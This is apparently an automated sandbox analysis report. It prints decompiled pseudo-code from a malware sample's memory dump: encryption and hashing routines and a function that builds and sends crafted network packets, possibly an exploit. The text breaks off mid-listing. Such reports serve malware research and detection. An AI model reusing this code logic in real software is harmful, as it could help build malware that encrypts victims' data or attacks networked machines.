                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 16%
                                                                                                          			E04A4559B(intOrPtr _a4) {
                                                                                                          				long _v8;
                                                                                                          				char _v12;
                                                                                                          				char _v16;
                                                                                                          				void* _v20;
                                                                                                          				void* _t19;
                                                                                                          				intOrPtr* _t25;
                                                                                                          
                                                                                                          				_t25 = __imp__CryptSetKeyParam;
                                                                                                          				_v12 = 1;
                                                                                                          				 *_t25(_a4, 4,  &_v12, 0);
                                                                                                          				_v16 = 1;
                                                                                                          				 *_t25(_a4, 3,  &_v16, 0);
                                                                                                          				_t19 =  &_v8;
                                                                                                          				_v8 = 0;
                                                                                                          				__imp__CryptGetKeyParam(_a4, 1, 0, _t19, 0);
                                                                                                          				if(_t19 != 0 && _v8 != 0) {
                                                                                                          					_t19 = LocalAlloc(0x40, _v8);
                                                                                                          					_v20 = _t19;
                                                                                                          					if(_t19 != 0) {
                                                                                                          						 *_t25(_a4, 1, _t19, 0);
                                                                                                          						return LocalFree(_v20);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t19;
                                                                                                          			}









                                                                                                          0x04a455a3
                                                                                                          0x04a455b9
                                                                                                          0x04a455bc
                                                                                                          0x04a455c8
                                                                                                          0x04a455cb
                                                                                                          0x04a455ce
                                                                                                          0x04a455d7
                                                                                                          0x04a455da
                                                                                                          0x04a455e2
                                                                                                          0x04a455ee
                                                                                                          0x04a455f4
                                                                                                          0x04a455f9
                                                                                                          0x04a45601
                                                                                                          0x00000000
                                                                                                          0x04a45606
                                                                                                          0x04a455f9
                                                                                                          0x04a45610

                                                                                                          APIs
                                                                                                          • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04A455BC
                                                                                                          • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04A455CB
                                                                                                          • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04A455DA
                                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 04A455EE
                                                                                                          • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04A45601
                                                                                                          • LocalFree.KERNEL32(?), ref: 04A45606
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptParam$Local$AllocFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3966954206-0
                                                                                                          • Opcode ID: cde82526fdf19d1ce06f7167f4d56ebf5cf5981328b7fbfa90da0d7104f2a680
                                                                                                          • Instruction ID: 7172103745ab52e1c90639c3c874eae623adcc0f4c4d09ccfbbeb01796985049
                                                                                                          • Opcode Fuzzy Hash: cde82526fdf19d1ce06f7167f4d56ebf5cf5981328b7fbfa90da0d7104f2a680
                                                                                                          • Instruction Fuzzy Hash: D301E5B6900218BFEB119F95DC84DAFBFBCEBC4790F004466FA05A2150D7759A51DAA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 25%
                                                                                                          			E04A456D8(int* __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t20;
                                                                                                          				intOrPtr _t22;
                                                                                                          				void* _t23;
                                                                                                          				int* _t25;
                                                                                                          				int _t26;
                                                                                                          				void* _t29;
                                                                                                          				void* _t30;
                                                                                                          				intOrPtr* _t31;
                                                                                                          				void** _t33;
                                                                                                          				void* _t34;
                                                                                                          
                                                                                                          				_t25 = __eax;
                                                                                                          				_v12 = 0;
                                                                                                          				if(_a12 != 0 && __eax != 0) {
                                                                                                          					_t31 = __imp__CryptEncrypt;
                                                                                                          					_v8 = 0xf0;
                                                                                                          					 *_t31(_a4, 0, 1, 0, 0,  &_v8, 0, _t30, _t34);
                                                                                                          					if(0 != 0) {
                                                                                                          						_t20 = LocalAlloc(0x40, _v8);
                                                                                                          						_v16 = _t20;
                                                                                                          						 *_a12 = _t20;
                                                                                                          						if(_t20 != 0) {
                                                                                                          							memcpy(_t20, _a8, 0xf0);
                                                                                                          							 *_t25 = 0xf0;
                                                                                                          							_t22 =  *_t31(_a4, 0, 1, 0, _v16, _t25, _v8);
                                                                                                          							_v12 = _t22;
                                                                                                          							if(_t22 == 0) {
                                                                                                          								_t33 = _a12;
                                                                                                          								_t26 =  *_t25;
                                                                                                          								_t23 =  *_t33;
                                                                                                          								_t29 = _t23;
                                                                                                          								while(_t26 != 0) {
                                                                                                          									 *_t29 = 0;
                                                                                                          									_t29 = _t29 + 1;
                                                                                                          									_t26 = _t26 - 1;
                                                                                                          								}
                                                                                                          								LocalFree(_t23);
                                                                                                          								 *_t33 = 0;
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v12;
                                                                                                          			}
















                                                                                                          0x04a456df
                                                                                                          0x04a456e3
                                                                                                          0x04a456e9
                                                                                                          0x04a456f9
                                                                                                          0x04a45711
                                                                                                          0x04a45714
                                                                                                          0x04a45718
                                                                                                          0x04a4571f
                                                                                                          0x04a45728
                                                                                                          0x04a4572b
                                                                                                          0x04a4572f
                                                                                                          0x04a45736
                                                                                                          0x04a45741
                                                                                                          0x04a45750
                                                                                                          0x04a45752
                                                                                                          0x04a45757
                                                                                                          0x04a45759
                                                                                                          0x04a4575c
                                                                                                          0x04a4575e
                                                                                                          0x04a45760
                                                                                                          0x04a45764
                                                                                                          0x04a45766
                                                                                                          0x04a45769
                                                                                                          0x04a4576a
                                                                                                          0x04a4576a
                                                                                                          0x04a4576e
                                                                                                          0x04a45774
                                                                                                          0x04a45774
                                                                                                          0x04a45757
                                                                                                          0x04a4572f
                                                                                                          0x04a45777
                                                                                                          0x04a4577d

                                                                                                          APIs
                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04A45714
                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 04A4571F
                                                                                                          • memcpy.MSVCRT ref: 04A45736
                                                                                                          • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A45750
                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 04A4576E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptEncryptLocal$AllocFreememcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 55365748-0
                                                                                                          • Opcode ID: 94d255ac6b908e0547984682f3a5ea221625a15502ef1569e7f5c32854d87aa6
                                                                                                          • Instruction ID: ea1a9e00567633f89bc19d29f5fbe258e40328ca59212606c956ed3c62555a5c
                                                                                                          • Opcode Fuzzy Hash: 94d255ac6b908e0547984682f3a5ea221625a15502ef1569e7f5c32854d87aa6
                                                                                                          • Instruction Fuzzy Hash: A52160B5E00215FFDF219FA5DC84E9EBFA9EF88750F104465FA04E7250D671AA11CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04A4579E
                                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,?,04A45988,00000000,?,?,?,?,?,?,?,?), ref: 04A457AD
                                                                                                          • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04A457C6
                                                                                                          • LocalFree.KERNEL32(00000000,?,04A45988,00000000,?,?,?,?,?,?,?,?), ref: 04A457D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BinaryCryptLocalString$AllocFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291131564-0
                                                                                                          • Opcode ID: 0b81a35663e982b6351421314ff7e74d42ff3f955a8644183aba1e83780f0bc5
                                                                                                          • Instruction ID: 01432f5a1fc3be4b82831c93300b8e210926177e2cb9e08d95a16c72f18de053
                                                                                                          • Opcode Fuzzy Hash: 0b81a35663e982b6351421314ff7e74d42ff3f955a8644183aba1e83780f0bc5
                                                                                                          • Instruction Fuzzy Hash: 8001BBBA600209FFEB019F98DC81EAE7BADEBC5754F104035BA0097250E6B1DE059B64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04A462E9,?,?,?,?), ref: 04A46260
                                                                                                          • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04A462E9,?,?,?,?), ref: 04A46273
                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04A462E9,?,?,?,?), ref: 04A46289
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptHash$CreateDataParam
                                                                                                          • String ID:
                                                                                                          • API String ID: 3669532303-0
                                                                                                          • Opcode ID: ed8c790ce228e31a8c5de7c0fea6129e3292dcd83d995a1f04409532474b5d4b
                                                                                                          • Instruction ID: 9210b6f99090b0bf29679621358215942089ce9b6181f84d6ae23ed8842e20db
                                                                                                          • Opcode Fuzzy Hash: ed8c790ce228e31a8c5de7c0fea6129e3292dcd83d995a1f04409532474b5d4b
                                                                                                          • Instruction Fuzzy Hash: 4FF017B6600308BFE7118FA4ED84EAB77BCFBC8744B508829F206E7540D775AE058B20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 60%
                                                                                                          			E04A429A2(intOrPtr _a4, void** _a8, short _a12, intOrPtr* _a16) {
                                                                                                          				void* _v8;
                                                                                                          				signed int _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _v20;
                                                                                                          				signed int _v24;
                                                                                                          				signed int _v28;
                                                                                                          				signed int _v32;
                                                                                                          				void* _t160;
                                                                                                          				signed int _t166;
                                                                                                          				void* _t172;
                                                                                                          				intOrPtr _t173;
                                                                                                          				short _t174;
                                                                                                          				short _t175;
                                                                                                          				signed int _t179;
                                                                                                          				short _t182;
                                                                                                          				signed int _t183;
                                                                                                          				signed int _t185;
                                                                                                          				intOrPtr _t188;
                                                                                                          				short _t189;
                                                                                                          				void* _t192;
                                                                                                          				void* _t195;
                                                                                                          				void* _t204;
                                                                                                          				short _t207;
                                                                                                          				short _t208;
                                                                                                          				short _t209;
                                                                                                          				void* _t217;
                                                                                                          				short _t223;
                                                                                                          				short _t224;
                                                                                                          				void* _t226;
                                                                                                          				void* _t227;
                                                                                                          				void* _t235;
                                                                                                          				void* _t240;
                                                                                                          				signed int _t241;
                                                                                                          				signed int _t246;
                                                                                                          				signed int _t247;
                                                                                                          				signed int _t252;
                                                                                                          				signed int _t254;
                                                                                                          				intOrPtr _t261;
                                                                                                          				signed int _t262;
                                                                                                          				void* _t264;
                                                                                                          				signed int _t271;
                                                                                                          				void** _t273;
                                                                                                          				signed int _t277;
                                                                                                          				intOrPtr* _t279;
                                                                                                          				intOrPtr _t280;
                                                                                                          				void** _t281;
                                                                                                          				void* _t285;
                                                                                                          				void* _t286;
                                                                                                          				void* _t289;
                                                                                                          				intOrPtr _t293;
                                                                                                          				void* _t297;
                                                                                                          				void* _t300;
                                                                                                          				void* _t302;
                                                                                                          				void* _t304;
                                                                                                          				intOrPtr* _t305;
                                                                                                          				intOrPtr* _t306;
                                                                                                          				void* _t307;
                                                                                                          				void* _t308;
                                                                                                          				void* _t309;
                                                                                                          				void* _t310;
                                                                                                          				void* _t313;
                                                                                                          
                                                                                                          				_v24 = 0xbadf00d;
                                                                                                          				_t160 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v8 = _t160;
                                                                                                          				if(_t160 == 0) {
                                                                                                          					L30:
                                                                                                          					return _v24;
                                                                                                          				}
                                                                                                          				_t240 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
                                                                                                          				if(_t240 == 0) {
                                                                                                          					L29:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v8);
                                                                                                          					goto L30;
                                                                                                          				}
                                                                                                          				_t273 = _a8;
                                                                                                          				_t166 = rand();
                                                                                                          				asm("cdq");
                                                                                                          				_t241 = 0x14;
                                                                                                          				 *((intOrPtr*)( *_t273 + 0x22)) =  *((intOrPtr*)( *_t273 + 0x22)) + _t166 % _t241;
                                                                                                          				_t297 =  *_t273;
                                                                                                          				_v28 = ( *(_t297 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                          				_t172 = memcpy(_t240, _t297, 0x100 << 2);
                                                                                                          				_t308 = _t307 + 0xc;
                                                                                                          				__imp__#9(0x50, 9);
                                                                                                          				 *(_t240 + 2) = _t172;
                                                                                                          				_t173 = 4;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x28)) = _t173;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x38)) = _t173;
                                                                                                          				_t174 = 5;
                                                                                                          				 *((short*)(_t240 + 0x49)) = _t174;
                                                                                                          				_t175 = 7;
                                                                                                          				_t277 = 0;
                                                                                                          				 *((short*)(_t240 + 0x4b)) = _t175;
                                                                                                          				 *((char*)(_t240 + 8)) = 0xa0;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                          				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x30)) = 0x3f40;
                                                                                                          				 *(_t240 + 0x34) = 0x10d0;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                          				 *(_t240 + 0x40) = 0;
                                                                                                          				 *(_t240 + 0x44) = 0;
                                                                                                          				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                          				 *((short*)(_t240 + 0x50)) = _a12;
                                                                                                          				do {
                                                                                                          					 *((char*)(_t240 + _t277 + 0x54)) = rand();
                                                                                                          					_t277 = _t277 + 1;
                                                                                                          				} while (_t277 < 0x10d0);
                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                          				do {
                                                                                                          					_t179 = rand();
                                                                                                          					_t246 = 0x14;
                                                                                                          					asm("cdq");
                                                                                                          					 *((intOrPtr*)( *_a8 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t179 % _t246;
                                                                                                          					_t279 = _a8;
                                                                                                          					_t182 =  *((intOrPtr*)( *_t279 + 0x22));
                                                                                                          					 *((short*)(_t240 + 0x22)) = _t182;
                                                                                                          					__imp__#19(_a4, _t240, 0x54, 0);
                                                                                                          					if(_t182 <= 0) {
                                                                                                          						goto L7;
                                                                                                          					}
                                                                                                          					__imp__#16(_a4, _v8, 0xffff, 0);
                                                                                                          					if(_t182 <= 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					L7:
                                                                                                          					_v12 = _v12 + 1;
                                                                                                          				} while (_v12 < 4);
                                                                                                          				_t280 =  *_t279;
                                                                                                          				_t183 = rand();
                                                                                                          				asm("cdq");
                                                                                                          				_t247 = 0x14;
                                                                                                          				_t185 = _t183 % _t247 +  *(_t280 + 0x22) & 0x0000ffff;
                                                                                                          				_v32 = _t185;
                                                                                                          				 *(_t280 + 0x22) = _t185;
                                                                                                          				__imp__#9(0x1120);
                                                                                                          				_t281 = _a8;
                                                                                                          				 *(_t240 + 2) = _t185;
                                                                                                          				 *((short*)(_t240 + 0x22)) =  *((intOrPtr*)( *_t281 + 0x22));
                                                                                                          				_t188 = 4;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x28)) = _t188;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                          				 *(_t240 + 0x2c) = 0x10d0;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x38)) = _t188;
                                                                                                          				_t189 = 5;
                                                                                                          				 *((short*)(_t240 + 0x49)) = _t189;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *_a16 + 0x74)) - 0x10d0;
                                                                                                          				 *(_t240 + 0x34) = 0x10d0;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                          				 *(_t240 + 0x40) = 0x10d0;
                                                                                                          				 *(_t240 + 0x44) = 0x50;
                                                                                                          				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                          				 *((short*)(_t240 + 0x4b)) = 0x10d7;
                                                                                                          				_t192 = HeapAlloc(GetProcessHeap(), 8, 0x160);
                                                                                                          				_v20 = _t192;
                                                                                                          				if(_t192 == 0) {
                                                                                                          					L28:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t240);
                                                                                                          					goto L29;
                                                                                                          				}
                                                                                                          				_t252 = 9;
                                                                                                          				_t195 = memcpy(_t192,  *_t281, _t252 << 2);
                                                                                                          				_t309 = _t308 + 0xc;
                                                                                                          				__imp__#9(0x15c);
                                                                                                          				_t300 = _v20;
                                                                                                          				 *(_t300 + 2) = _t195;
                                                                                                          				 *((intOrPtr*)(_t300 + 0x2c)) = 0x114;
                                                                                                          				 *((intOrPtr*)(_t300 + 0x3c)) = 0x114;
                                                                                                          				 *((char*)(_t300 + 8)) = 0xa1;
                                                                                                          				 *((char*)(_t300 + 0x24)) = 0x12;
                                                                                                          				 *(_t300 + 0x40) = 0x48;
                                                                                                          				 *((short*)(_t300 + 0x49)) = 0x115;
                                                                                                          				_t285 = 0;
                                                                                                          				do {
                                                                                                          					 *((char*)(_t300 + _t285 + 0x4c)) = rand();
                                                                                                          					_t285 = _t285 + 1;
                                                                                                          				} while (_t285 <  *((intOrPtr*)(_t300 + 0x3c)));
                                                                                                          				_t286 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                          				_v16 = _t286;
                                                                                                          				if(_t286 == 0) {
                                                                                                          					L27:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t300);
                                                                                                          					goto L28;
                                                                                                          				}
                                                                                                          				_t254 = 9;
                                                                                                          				_t204 = memcpy(_t286,  *_a8, _t254 << 2);
                                                                                                          				_t310 = _t309 + 0xc;
                                                                                                          				__imp__#9(0x44);
                                                                                                          				_t302 = _v16;
                                                                                                          				 *(_t302 + 2) = _t204;
                                                                                                          				 *((short*)(_t302 + 0x22)) = _v28;
                                                                                                          				 *((short*)(_t302 + 0x25)) = 0x200;
                                                                                                          				 *((char*)(_t302 + 8)) = 0x25;
                                                                                                          				 *((char*)(_t302 + 0x24)) = 0xe;
                                                                                                          				 *(_t302 + 0x31) =  *(_t302 + 0x31) | 0xffffffff;
                                                                                                          				_t207 = 4;
                                                                                                          				 *((short*)(_t302 + 0x37)) = _t207;
                                                                                                          				_t208 = 0x40;
                                                                                                          				 *((short*)(_t302 + 0x39)) = _t208;
                                                                                                          				_t209 = 5;
                                                                                                          				 *((short*)(_t302 + 0x41)) = _t209;
                                                                                                          				 *((short*)(_t302 + 0x27)) =  *((intOrPtr*)( *_a16 + 0x7c)) - 0x200;
                                                                                                          				 *((short*)(_t302 + 0x44)) = _a12;
                                                                                                          				_t289 = HeapAlloc(GetProcessHeap(), 8, 0x1638);
                                                                                                          				_v12 = _t289;
                                                                                                          				if(_t289 == 0) {
                                                                                                          					L26:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t302);
                                                                                                          					_t300 = _v20;
                                                                                                          					goto L27;
                                                                                                          				}
                                                                                                          				memcpy(_t289, _t240, 0x1124);
                                                                                                          				_t110 = _t289 + 0x1124; // 0x1124
                                                                                                          				_t217 = memcpy(_t110, _v20, 0x160);
                                                                                                          				__imp__#9(0x50);
                                                                                                          				 *(_t240 + 2) = _t217;
                                                                                                          				 *((short*)(_t240 + 0x22)) = _a12;
                                                                                                          				_t261 = 4;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x28)) = _t261;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
                                                                                                          				 *(_t240 + 0x40) =  *(_t240 + 0x40) & 0x00000000;
                                                                                                          				_t271 =  *((intOrPtr*)( *_a16 + 0x74)) - 0x1000;
                                                                                                          				 *(_t240 + 0x44) =  *(_t240 + 0x44) & 0x00000000;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x30)) = 0x1000;
                                                                                                          				 *(_t240 + 0x34) = _t271;
                                                                                                          				_t223 = 5;
                                                                                                          				 *((short*)(_t240 + 0x49)) = _t223;
                                                                                                          				_t224 = 7;
                                                                                                          				 *((short*)(_t240 + 0x4b)) = _t224;
                                                                                                          				_t126 = _t289 + 0x1284; // 0x1284
                                                                                                          				 *((intOrPtr*)(_t240 + 0x38)) = _t261;
                                                                                                          				_t262 = 0x15;
                                                                                                          				 *(_t240 + 0x2c) = _t271;
                                                                                                          				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
                                                                                                          				 *((char*)(_t240 + 0x48)) = 0;
                                                                                                          				_t226 = memcpy(_t126, _t240, _t262 << 2);
                                                                                                          				_t313 = _t310 + 0x24;
                                                                                                          				_t132 = _t226 + 0x54; // 0x12d8
                                                                                                          				_t304 = _t132;
                                                                                                          				_t293 = 0xc;
                                                                                                          				do {
                                                                                                          					_t227 = _v16;
                                                                                                          					 *((short*)(_t227 + 0x22)) =  *((short*)(_t227 + 0x22)) + 1;
                                                                                                          					memcpy(_t304, _t227, 0x48);
                                                                                                          					_t313 = _t313 + 0xc;
                                                                                                          					_t304 = _t304 + 0x48;
                                                                                                          					_t293 = _t293 - 1;
                                                                                                          				} while (_t293 != 0);
                                                                                                          				_t305 = __imp__#19;
                                                                                                          				_push(_t293);
                                                                                                          				_push(0x111c);
                                                                                                          				_push(_v12);
                                                                                                          				_push(_a4);
                                                                                                          				if( *_t305() <= 0) {
                                                                                                          					L25:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          					_t302 = _v16;
                                                                                                          					goto L26;
                                                                                                          				}
                                                                                                          				_push(_t293);
                                                                                                          				_push(0x51c);
                                                                                                          				_push(_v12 + 0x111c);
                                                                                                          				_push(_a4);
                                                                                                          				if( *_t305() <= 0) {
                                                                                                          					goto L25;
                                                                                                          				}
                                                                                                          				_t306 = __imp__#16;
                                                                                                          				_push(_t293);
                                                                                                          				_a12 = _t293;
                                                                                                          				_push(0xffff);
                                                                                                          				_push(_v8);
                                                                                                          				while(1) {
                                                                                                          					_t235 =  *_t306(_a4);
                                                                                                          					if(_t235 <= 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t264 = _v8;
                                                                                                          					_a12 = _a12 + _t235;
                                                                                                          					if( *((intOrPtr*)(_t264 + 9)) != 0) {
                                                                                                          						goto L25;
                                                                                                          					}
                                                                                                          					if(_a12 >= 0x147b) {
                                                                                                          						if(E04A42708(_t264, _t264, _t235, _a16) != 0) {
                                                                                                          							_v24 = _v24 & 0x00000000;
                                                                                                          							 *((short*)( *_a8 + 0x22)) = _v32;
                                                                                                          						}
                                                                                                          						goto L25;
                                                                                                          					}
                                                                                                          					_push(0);
                                                                                                          					_push(0xffff);
                                                                                                          					_push(_t264);
                                                                                                          				}
                                                                                                          				goto L25;
                                                                                                          			}
































































                                                                                                          0x04a429b8
                                                                                                          0x04a429c8
                                                                                                          0x04a429ca
                                                                                                          0x04a429cf
                                                                                                          0x04a42e08
                                                                                                          0x04a42e0f
                                                                                                          0x04a42e0f
                                                                                                          0x04a429e1
                                                                                                          0x04a429e5
                                                                                                          0x04a42df6
                                                                                                          0x04a42e02
                                                                                                          0x00000000
                                                                                                          0x04a42e02
                                                                                                          0x04a429eb
                                                                                                          0x04a429f0
                                                                                                          0x04a429f6
                                                                                                          0x04a429f9
                                                                                                          0x04a42a03
                                                                                                          0x04a42a07
                                                                                                          0x04a42a20
                                                                                                          0x04a42a23
                                                                                                          0x04a42a23
                                                                                                          0x04a42a25
                                                                                                          0x04a42a2d
                                                                                                          0x04a42a31
                                                                                                          0x04a42a32
                                                                                                          0x04a42a35
                                                                                                          0x04a42a3a
                                                                                                          0x04a42a3b
                                                                                                          0x04a42a41
                                                                                                          0x04a42a47
                                                                                                          0x04a42a49
                                                                                                          0x04a42a51
                                                                                                          0x04a42a55
                                                                                                          0x04a42a5c
                                                                                                          0x04a42a5f
                                                                                                          0x04a42a66
                                                                                                          0x04a42a69
                                                                                                          0x04a42a70
                                                                                                          0x04a42a73
                                                                                                          0x04a42a76
                                                                                                          0x04a42a7a
                                                                                                          0x04a42a7e
                                                                                                          0x04a42a84
                                                                                                          0x04a42a88
                                                                                                          0x04a42a89
                                                                                                          0x04a42a8d
                                                                                                          0x04a42a91
                                                                                                          0x04a42a96
                                                                                                          0x04a42a9e
                                                                                                          0x04a42a9f
                                                                                                          0x04a42aaa
                                                                                                          0x04a42aae
                                                                                                          0x04a42ab3
                                                                                                          0x04a42ab7
                                                                                                          0x04a42abb
                                                                                                          0x04a42ac3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42ad2
                                                                                                          0x04a42ada
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a42adc
                                                                                                          0x04a42adc
                                                                                                          0x04a42adf
                                                                                                          0x04a42ae5
                                                                                                          0x04a42ae7
                                                                                                          0x04a42aef
                                                                                                          0x04a42af0
                                                                                                          0x04a42afc
                                                                                                          0x04a42aff
                                                                                                          0x04a42b02
                                                                                                          0x04a42b06
                                                                                                          0x04a42b0c
                                                                                                          0x04a42b14
                                                                                                          0x04a42b20
                                                                                                          0x04a42b24
                                                                                                          0x04a42b25
                                                                                                          0x04a42b2a
                                                                                                          0x04a42b31
                                                                                                          0x04a42b37
                                                                                                          0x04a42b3a
                                                                                                          0x04a42b3b
                                                                                                          0x04a42b4b
                                                                                                          0x04a42b4e
                                                                                                          0x04a42b51
                                                                                                          0x04a42b58
                                                                                                          0x04a42b5b
                                                                                                          0x04a42b62
                                                                                                          0x04a42b66
                                                                                                          0x04a42b71
                                                                                                          0x04a42b77
                                                                                                          0x04a42b7c
                                                                                                          0x04a42de6
                                                                                                          0x04a42df0
                                                                                                          0x00000000
                                                                                                          0x04a42df0
                                                                                                          0x04a42b86
                                                                                                          0x04a42b8e
                                                                                                          0x04a42b8e
                                                                                                          0x04a42b90
                                                                                                          0x04a42b96
                                                                                                          0x04a42b99
                                                                                                          0x04a42ba2
                                                                                                          0x04a42ba5
                                                                                                          0x04a42ba9
                                                                                                          0x04a42bad
                                                                                                          0x04a42bb1
                                                                                                          0x04a42bb8
                                                                                                          0x04a42bbc
                                                                                                          0x04a42bbe
                                                                                                          0x04a42bc4
                                                                                                          0x04a42bc8
                                                                                                          0x04a42bc9
                                                                                                          0x04a42bdf
                                                                                                          0x04a42be1
                                                                                                          0x04a42be6
                                                                                                          0x04a42dd6
                                                                                                          0x04a42de0
                                                                                                          0x00000000
                                                                                                          0x04a42de0
                                                                                                          0x04a42bf3
                                                                                                          0x04a42bf6
                                                                                                          0x04a42bf6
                                                                                                          0x04a42bf8
